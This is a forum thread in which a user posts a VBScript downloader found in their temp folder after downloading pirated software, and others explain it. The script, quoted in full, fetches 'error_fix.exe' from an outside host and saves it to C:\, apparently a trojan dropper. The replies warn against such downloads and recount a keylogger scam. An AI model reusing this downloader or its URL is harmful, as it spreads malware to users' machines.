What do you make of this script, trojan downloader?

O

onetwenty8k

2[H]4U
Joined
Nov 24, 2006
Messages
2,554
I downloaded something of let's say, questionable material to get "100% parts" if you know what I mean. I started getting errors thrown by UAC blocking a script. I went into my temp folder and there was a vb script called "dl" I opened it and it looks like it was trying to download a trojan. Not the name of the exe was changing. One time it was directx, other time it was sytem_fix, you get the idea. Here is the script, anyone care to tell me what exactly it was doing?

Code: 
HTTPDownload "http://1234now.0catch.com/error_fix.exe","C:\" 
Sub HTTPDownload( myURL, myPath ) 
Dim i, objFile, objFSO, objHTTP, strFile, strMsg 
Const ForReading = 1, ForWriting = 2, ForAppending = 8 
Set objFSO = CreateObject( "Scripting.FileSystemObject" ) 
If objFSO.FolderExists( myPath ) Then 
strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) 
ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then 
strFile = myPath 
Else 
Exit Sub 
End If 
Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) 
Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) 
objHTTP.Open "GET", myURL, False 
objHTTP.Send 
For i = 1 To LenB( objHTTP.ResponseBody ) 
objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) 
Next 
objFile.Close( ) 
End Sub
 
Well, that's what you get when you download files from questionable sources.

There was a guy here once purporting to want to buy a vidcard. He asked sellers to run some performance test on theirs. Don't remember the name of the program, but it was available as a limited demo from the official site. He PM'd people asking them to download what he said was an unlimited "cracked" version that he'd uploaded to one of those file sharing sites.

It was cracked alright... had a keylogger embedded into it. A bunch of people got scammed by it.
 
Unsurprisingly, it's going to make an HTTP request for "http://1234now.0catch.com/error_fix.exe" and save it to C:\. I don't have much desire to try to download that to see for sure if it's a trojan, but I'm pretty certain it's not going to fix your errors.
 
You must log in or register to reply here.
Back
Top